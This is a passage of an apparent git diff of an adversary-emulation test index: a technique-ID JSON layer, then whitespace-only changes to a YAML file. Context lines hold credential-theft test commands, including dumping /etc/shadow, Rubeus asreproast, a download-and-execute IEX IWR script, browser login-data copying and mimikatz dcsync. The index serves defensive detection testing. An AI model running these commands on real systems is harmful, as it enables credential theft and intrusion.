Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 167324d3..b54288eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed - ' +' supported_platforms: - linux input_arguments: 
@@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins - ' +' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" - ' +' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture - ' +' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - ' +' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. - ' +' supported_platforms: - containers input_arguments: 
@@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get secrets -n #{namespace} - ' +' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. - ' +' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl 
@@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod - ' +' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - ' +' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod - ' +' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; - ' +' executor: name: bash elevation_required: false 
@@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all - ' +' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files - ' +' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} - ' +' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. - ' +' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore - ' +' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all - ' +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b 
@@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) - ' +' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed - ' +' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File - ' +' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp - ' +' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - ' +' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | 
@@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force - ' +' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s - ' +' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync 